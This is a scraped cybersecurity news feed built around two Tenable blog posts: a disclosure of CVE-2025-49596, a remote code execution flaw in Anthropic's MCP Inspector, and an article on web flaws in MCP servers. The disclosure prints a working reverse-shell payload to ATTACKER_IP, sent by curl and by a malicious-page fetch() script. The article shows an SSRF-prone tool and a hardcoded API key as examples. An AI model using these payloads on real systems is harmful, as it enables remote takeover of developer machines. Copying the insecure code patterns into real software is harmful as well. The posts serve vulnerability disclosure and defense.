Splunk has released critical security updates addressing multiple vulnerabilities in third-party packages in SOAR versions 6.4.0 and 6.4. Published on July 7, 2025, this comprehensive security update remediates various Common Vulnerabilities and Exposures (CVEs) ranging from medium to critical severity levels. The vulnerabilities affect essential components, including git, Django, cryptography libraries, and JavaScript packages, requiring […]
The post Splunk Address Third-Party Packages Vulnerabilities in SOAR Versions – Update Now appeared first on Cyber Security News.
A new Android vulnerability called TapTrap that allows malicious apps to bypass the operating system’s permission system without requiring any special permissions themselves. The attack exploits activity transition animations—a core feature of Android’s user interface—to trick users into unknowingly granting sensitive permissions or performing destructive actions. Unlike traditional tapjacking attacks that rely on malicious overlays, […]
The post TapTrap Android Exploit Allows Malicious Apps to Bypass Permissions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
Microsoft has released critical security updates addressing a severe remote code execution vulnerability that could allow attackers to execute malicious code across networks without user interaction. The vulnerability, tracked as CVE-2025-47981, affects Windows client machines running Windows 10 version 1607 and above, potentially exposing millions of systems to cyberattacks. Critical Security Vulnerability Details The SPNEGO Extended […]
The post Microsoft Fixes Wormable Remote Code Execution Flaw in Windows and Server appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
A critical Local File Inclusion (LFI) vulnerability was recently discovered in Microsoft 365’s Export to PDF functionality, potentially allowing attackers to access sensitive server-side data, including configuration files, database credentials, and application source code. The vulnerability, reported by security researcher Gianluca Baldi and subsequently patched by Microsoft, earned a $3,000 bounty reward for its significant […]
The post Microsoft 365 PDF Export LFI Vulnerability Allows Access to Sensitive Server Data appeared first on Cyber Security News.
A sophisticated threat network called “Triad Nexus,” which operates through the FUNNULL content delivery network (CDN) to hide malicious infrastructure within major Western cloud providers including Amazon and Microsoft. The operation, led by sanctioned individual Lizhi Liu, has facilitated over $200 million in losses to U.S. victims through investment fraud schemes. Silent Push threat analysts […]
The post FUNNULL Uses Amazon and Microsoft Cloud to Hide Malicious Infrastructure appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
“In today’s fast-paced digital landscape” – as AI chatbots are fond of phrasing it – a cyber attack targeting your organization is a statistical certainty. But is your security team ready to respond when it happens? Can they confidently determine what happened, and how? If the answer is “no” or “I’m not sure,” then TryHackMe is the workforce upskilling solution you didn’t know you needed. What is TryHackMe? TryHackMe is an interactive cybersecurity training platform … More →
The post Train smarter, respond faster: Close the skill gaps in your SOC appeared first on Help Net Security.
Tenable Research recently discovered a critical vulnerability impacting Anthropic's MCP Inspector tool, a core element of the MCP ecosystem. In this blog, we provide details on how we discovered the vulnerability in this widely used open-source tool — and what users can do about it.
Tenable Research discovered a critical vulnerability (CVE-2025-49596) in Anthropic's MCP Inspector. This open-source tool, widely used for testing and troubleshooting Model Context Protocol (MCP) servers, is highly popular with over 38,000 weekly downloads on npmjs and more than 4,000 stars on GitHub. Further details are available in the advisory.
A victim's workstation could be fully compromised simply by visiting a malicious website, with no other prerequisites.
This vulnerability has been assigned CVE-2025-49596 with a critical CVSS score of 9.4. Tenable worked closely with Anthropic’s security team according to our coordinated disclosure policy. The vulnerability has been widely publicized, sometimes without crediting the finding back to Tenable Research.
It is recommended to upgrade immediately to version or 0.14.1 or later to fix this vulnerability.
ContextThe increasing prevalence of AI technologies across organizations is driving rapid adoption of MCP. It plays a crucial role in enhancing AI agents by providing them with additional context and tools.
Since there’s no official registry for MCP servers, which are developed by vendors or the open-source community, they’re typically published on various MCP marketplaces like MCP Market or MCP.so.
A server, once deployed either locally via STDIO or remotely via HTTP, can be leveraged by a Large Language Model through an MCP client.
Want more information about MCP? Read the blogs Frequently Asked Questions About Model Context Protocol (MCP) and Integrating with AI for Agentic Applications and AI Security: Web Flaws Resurface In Rush to Use MCP Servers.
MCP Inspector for developersTesting and troubleshooting MCP servers can be challenging, despite the availability of numerous development frameworks, including Anthropic software development kits (SDKs) for various languages (listed on the MCP GitHub page). This complexity arises from the need to understand the underlying protocol.
MCP Inspector is an open-source tool provided by Anthropic to abstract this complexity and help developers interact with their servers. This tool relies on two key components:
In MCP Inspector versions below 0.14.1, the official instructions to run MCP inspector are straightforward:
npx @modelcontextprotocol/inspector Need to install the following packages: @modelcontextprotocol/inspector@ Ok to proceed? (y) y Starting MCP inspector... ⚙️ Proxy server listening on port 6277 🔍 MCP Inspector is up and running at http://127.0.0.1:6274Now, both the MCP Inspector Client and the MCP Proxy are listening, respectively, on TCP ports 6274 and 6277.
Since MCP Inspector is a tool integrated in multiple open source projects, this vulnerability exists in all software relying on versions prior to 0.14.1
Out-of the-box Remote Code ExecutionOnce started, we decided to connect on the Web UI available on http://127.0.0.1:6274
The Web UI is available out-of-the box without any authentication:
MCP Inspector Web UI (Source: Tenable)By trying to connect to a local dummy MCP server, we can observe the HTTP traffic and notice the following HTTP connection from the Web UI to the MCP proxy server:
MCP Inspector Web UI (Source: Tenable)The HTTP request is made to the local MCP proxy server without any kind of authentication, and the proxy server is then spawning new processes based on the command sent by the client.
We decided to have a quick try with a basic sleep command and a delay of 10 seconds and noticed that it was actually executed, proving the vulnerability:
Basic vulnerability exploitation (Source: Tenable)Once an attacker can achieve command injection, it is then possible to escalate to code execution on the affected server.
ExploitationWith the vulnerability now identified, let's explore the exploitation scenarios that could lead to a complete takeover of the host running the MCP Proxy component.
Direct unauthenticated Remote Code ExecutionThe default installation of MCP Inspector in vulnerable versions implies that the MCP proxy component is bound on all network interfaces.
const PORT = process.env.PORT || 6277; const server = app.listen(PORT); server.on("listening", () => { console.log(`⚙️ Proxy server listening on port ${PORT}`); });If an attacker is on the same network as the machine hosting the proxy instance, or if the MCP Inspector proxy is started on a publicly accessible server, a remote and unauthenticated attacker can achieve direct command injection and gain remote code execution with the proxy’s user privileges on the target system.
Using the payload described in our Tenable Research Advisory, we can quickly get a reverse shell on the target system:
# Start a listener on TCP/7777 nc -l -p 7777 # Build a payload which will establish a simple reverse shell to our local IP on the previous port PAYLOAD_BASH=“bash -c ‘bash -i >& /dev/tcp/ATTACKER_IP/7777 0>&1’” # URI encode the payload ENCODED_PAYLOAD_BASH=$(echo -n “$PAYLOAD_BASH” | jq -sRr @uri) # Request the MCP Inspector Proxy with the previous payload to achieve Remote Code Execution curl “http://MCP_INSPECTOR_PROXY:6277/sse?transportType=stdio&command=bash&args=-c%20%22$ENCODED_PAYLOAD_BASH%22”The developer or the server machine hosting the MCP Inspector proxy is then fully compromised.
CORS Attack to Remote Code Execution (RCE)In affected versions, the lack of network restrictions leaves MCP Inspector users vulnerable to cross-site attacks initiated by remote malicious websites.
An attacker can set up a website hosting a malicious JavaScript, which will perform cross-site requests:
MCP Inspector Proxy CORS attack (Source: Tenable)Taking back our previous reverse shell payload, let’s demonstrate how this can be easily exploited.
1. The attacker sets up a malicious website hosting this JavaScript content:
<script> fetch("http://127.0.0.1:6277/sse?transportType=stdio&command=bash&args=-c%20%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER_IP%2F7777%200%3E%261%27%22&env=", {}) </script>2. The victim browses the malicious website and loads the malicious JavaScript content, which will perform a cross-origin request to the MCP inspector proxy hosted on his machine (or potentially any other machine).
3. MCP Inspector uses the Express CORS middleware allowing any origin by default (Access-Control-Allow-Origin: *). This means the victim’s web browser will perform a CORS preflight request on the MCP Inspector, which will pass the policy:
app.use(cors());4. The actual CORS request will then be sent by the victim’s browser to the MCP Inspector proxy, leading to the payload being executed and the reverse shell established from the victim’s workstation to the attacker’s server.
This demonstrates how critical this vulnerability is: A victim's workstation could be fully compromised simply by visiting a malicious website, with no other prerequisites.
DNS rebindingThe MCP proxy exposes by default a Server-Sent Events (SSE) endpoint. As no network restriction is enforced, especially in the control of the Host header, a malicious website could host a JavaScript code which would:
Note that the exploitation success of DNS rebinding depends on both the web browser and the operating system of the victim.
To learn more about DNS rebinding, have a look at NCC Group’s Singularity tool.
RemediationMCP Inspector’s users are required to upgrade to version 0.14.1 or later as soon as possible. Software that uses vulnerable versions of the MCP Inspector package should also be updated as soon as possible to address this vulnerability.
Starting with this version, Anthropic introduced additional security measures to safeguard against the described attacks. By default:
When starting, MCP Inspector now shows:
Starting MCP inspector... ⚙️ Proxy server listening on 127.0.0.1:6277 🔑 Session token: 86399ac989f1d418c530f08811cee3fa6115d1f5e8ac39d631d72d11d573a729 Use this token to authenticate requests or set DANGEROUSLY_OMIT_AUTH=true to disable auth 🔗 Open inspector with token pre-filled: http://localhost:6274/?MCP_PROXY_AUTH_TOKEN=86399ac989f1d418c530f08811cee3fa6115d1f5e8ac39d631d72d11d573a729 🔍 MCP Inspector is up and running at http://127.0.0.1:6274 🚀 ConclusionTenable Research recognized early the significant role AI and MCP technologies would play in organizations — and the new security challenges they would introduce. To address these, it's crucial to enforce security fundamentals in server development and tool usage. Adhering to basic security practices can significantly mitigate risks from vulnerabilities in novel systems and prevent devastating attacks.
We thank Anthropic’s security team for their efforts in mitigating this issue and their clear communication during our disclosure process.
Learn moreIn the rush to implement AI tools and services, developers are rapidly embracing the Model Context Protocol (MCP). In the process, classic vulnerabilities are resurfacing and new ones are being introduced. In this blog, we outline key areas of concern and how Tenable Web App Scanning can help.
The Model Context Protocol (MCP) is an open standard introduced by Anthropic in late 2024 and quickly adopted by OpenAI, Google and Microsoft. It allows AI assistants to connect with external data sources and tools and improve their capabilities.
The MCP ecosystem has exploded in recent months as developers rush to meet business demand and integrate this powerful new standard into their applications and AI-based workflows to easily provide efficient cross-product integrations. In the process, fundamental development mistakes are being repeated.
Meanwhile, the rapid adoption of AI across organizations has security teams struggling to understand the threat implications as they learn how to secure AI for their business teams.
Want to learn more about MCP-related risks? Read the blog How Tenable Research Discovered a Critical Remote Code Execution Vulnerability on Anthropic MCP Inspector
As new vulnerability classes arise from the usage of LLMs and other AI-based technologies, MCP server developers generally seem to focus on the LLM integration more than the underlying API development, bringing back classic web vulnerabilities that can be devastating.
This blog delves into key security concerns for MCP servers and how Tenable Web App Scanning can help security teams detect such vulnerabilities.
Introduction to MCPMCP was released by Anthropic at the end of November 2024, providing developers with a full development kit for both clients and servers to build secure connections between AI-powered tools and various data sources available in an organization or hosted by a third-party provider.
Transport modesAs described in a previous blog post, the protocol is built on a few key components. In this blog, we focus on the MCP server component.
MCP servers can be exposed to clients with two main transport modes:
Once the transport mode is defined, the MCP will rely on three types of JSON-RPC-based messages between the MCP client and the server: requests, responses and notifications.
We won’t cover all the message formats as they are all defined in the protocol specification, but a standard flow is defined as follows:
MCP lifecycle (Source: https://modelcontextprotocol.io/specification/2025-06-18/basic/lifecycle)The protocol is straightforward and relies on:
For example, if a client wants to know the list of tools exposed by the server and call one of them, it will use this message after initialization:
{ "jsonrpc": "2.0", "method": "tools/list", "params": {}, "id": 1 }The server will respond with a list of the tools:
{ "jsonrpc":"2.0", "id":1, "result": { "tools": [ { "name":"fetch_url", "description":"Fetch content from an URL”, "inputSchema": { "properties":{ "url":{ "title":"url", "Type":"string" } }, "required":["url"], "Type":"object" } }Then it is possible to call a specific tool like an LLM would do through a MCP client:
{ "jsonrpc": "2.0", "method": "tools/call", "params": { "name": "TOOL_NAME", "arguments": { "TOOL_ARG_1": "ARG_1_VALUE" } }, "id": 1 }Here’s another option to list the resources exposed by an MCP server:
{ "jsonrpc": "2.0", "method": "resources/list", "params": {}, "id": 1 }The server will then return all the resources available:
{ "jsonrpc":"2.0", "id":1, "result":{ "resources": [ { "uri":"config://secret", "name":"config://secret", "mimeType":"text/plain" } ] } The AI adoption race meets MCP server web flawsThe MCP promise is to enable organizations to quickly expand AI-based workflow capabilities by interconnecting AI assistants and agents with a large range of tools and resources. We previously discussed the HTTP transport mode and the ability to communicate with MCP servers like any other API.
In recent months, we have seen an exponential increase in the availability of MCP servers, as shown by the rise of MCP server marketplaces like https://mcpservers.org/ or https://mcpmarket.com/, and the popularity of some projects such as https://github.com/punkpeye/awesome-mcp-servers (which had received more than 56,000 GitHub stars at the time this blog post was written).
Unfortunately, the rapid delivery of new and interesting features and use cases for a variety of tools and software can come at a high cost when security basics are overlooked. Below, we highlight three key areas of cyber risk.
1. Authentication and authorizationA March 26 MCP update introduced support for OAuth 2.1 to enforce resource access control at the transport level. MCP clients can now use OAuth flows to obtain access tokens and consume resources exposed by the MCP server. Note that the authorization server used in this OAuth workflow still has to authenticate users as the MCP server does not natively handle this.
When MCP servers are expected to be exposed for an organization's internal needs only, enforcing both authentication and authorization is required and developers should focus on restricting access to the tools by implementing these mechanisms and ensuring they are robust.
A common mistake could be to assume that the server is “only” expected to be available on an internal infrastructure, presumably preventing it from being visible from a remote and unauthenticated user. However, HTTP-based MCP servers can suffer the same issues as other web / API applications, especially in a cross-origin context:
DNS Rebinding Attack Flow (Source: Tenable)The above diagram illustrates how an attacker can exploit the lack of control in this situation:
Another example of the impact of lack of authentication is Tenable’s recent vulnerability discovery on the MCP Inspector tool. Although this tool is not a MCP server, it is part of the MCP ecosystem and shows how such tools, provided as open-source by a major LLM provider, can put organizations and their users at risk.
2. Tool vulnerabilitiesA tool within the MCP context is simply a function that can be called through the JSON-RPC messages with a specific list of arguments (of a specific type). From numerous implementations observed, it looks like MCP server developers tend to forget that a “low level” API call can target tools and exploit any vulnerability if existing.
Let’s take a very simple example with this tool:
@mcp.tool() def fetch_url(url: str) -> str: """Fetch content from a URL.""" try: response = requests.get(url, verify=False) response.raise_for_status() return response.text except requests.RequestException as e: return f"Error fetching URL: {e}"By sending the following JSON-RPC message, we can fetch a URL and get the response:
{ "jsonrpc": "2.0", "method": "tools/call", "params": { "name": "fetch_url", "arguments": { "url": "https://www.tenable.com" } }, "id": 1 }A common cognitive bias seems to be that the LLM, through the MCP client, will use the tools without going off the beaten track, completely masking the need to sanitize and validate the inputs. In this case, a remote MCP server will be vulnerable to “full-read” Server-Side Request Forgery attacks.
This demonstrates a single vulnerability case, but this can be easily extrapolated to almost all the web vulnerabilities (remote code execution, SQL injection, etc.). Independent research shows that numerous exposed services are vulnerable to various attacks, such as code execution, path traversal, etc.
3. Sensitive information exposureTo avoid complex flows and infrastructures, developers sometimes choose to hardcode or make sensitive information available in various ways. This includes but is not limited to secrets such as credentials or business sensitive information.
As with any function, tools can sometimes either directly embed sensitive information, or call third-party services which can expose it. For example:
Among the context primitives available in the MCP servers, the resources are designed to expose data that can be read by clients and used as context for LLM operations. A tempting shortcut could be to feed the LLM through its MCP client with data that could be reused, for example, to authenticate on another service.
Given the different options available to expose these resources, like static files or databases, this should be a point of concern when developing MCP servers and secrets management best practices should still be applied in this context.
The following code snippet declares a resource exposing a random API key:
@mcp.resource("data://api_key") def get_api_key() -> str: """Internal Service API Key""" return "API_KEY=internalAPIkey1234" Empowering Tenable Web App Scanning for MCP serversTenable Web App Scanning is designed to detect complex vulnerabilities across modern web applications and APIs. As AI-driven architectures rapidly evolve, we are expanding our scanning capabilities to cover emerging protocols that power the next generation of AI-native infrastructure.
MCP servers can rely on the HTTP protocol, which inherently expands the attack surface. Protecting MCP servers requires adhering to well-established security paradigms and in-depth vulnerability detection to stay ahead of modern and sophisticated threats.
New MCP-specific plugins recently added to Tenable Web App Scanning can help organizations identify such servers in their infrastructure and discover any associated vulnerabilities. MCP servers are built very quickly by many vendors, but they can also be deployed as quickly and easily by an organization’s AI developers, becoming part of the “shadow IT” blindspot that security teams have to contend with.
When MCP assets are detected, Tenable Web App Scanning plugins are now able to understand and analyze the API-related vulnerabilities in the target MCP server implementation. This includes a broad range of vulnerabilities, such as code execution and SQL injections, which will then be tested on all detected tools of the target MCP server.
Tenable Web App Scanning - MCP Server Detection Plugins (Source: Tenable) Tenable Web App Scanning - MCP Server Vulnerabilities Plugins (Source: Tenable) ConclusionThe massive adoption of MCP demonstrates the level of interest and focus organizations are placing on AI technologies as they look to provide tools to enhance workflow and improve productivity.
While MCP warrants an important role in AI software ecosystems, bringing organizations new opportunities in their data exploitation or business workflows and intelligence, it should be implemented carefully. Developers need to follow security best practices and safeguard against traditional threats as well as the specific vulnerabilities emerging from AI technologies.
Continuously monitoring and assessing MCP server security and updating as needed is a mandatory requirement to avoid putting organizations at risk in the rush to adopt AI.
Learn moreA sophisticated cyberattack orchestrated by Chinese state-sponsored hackers has exposed vulnerabilities in the global cybersecurity infrastructure, targeting critical COVID-19 research from American universities and exploiting Microsoft Exchange servers worldwide. The Justice Department announced the arrest of a key figure in this operation, marking a significant milestone in the fight against state-sponsored cyber espionage. Xu Zewei, […]
The post Chinese Hackers Exploit Microsoft Exchange Servers to Steal COVID-19 Research Data appeared first on Cyber Security News.
A critical security vulnerability in Windows BitLocker enables attackers to bypass the encryption feature through a sophisticated time-of-check time-of-use (TOCTOU) race condition attack. Designated as CVE-2025-48818, this vulnerability affects multiple Windows versions and carries an Important severity rating with a CVSS score of 6.8. The flaw allows unauthorized attackers with physical access to circumvent BitLocker […]
The post Windows BitLocker Bypass Vulnerability Let Attackers Bypass Security Feature appeared first on Cyber Security News.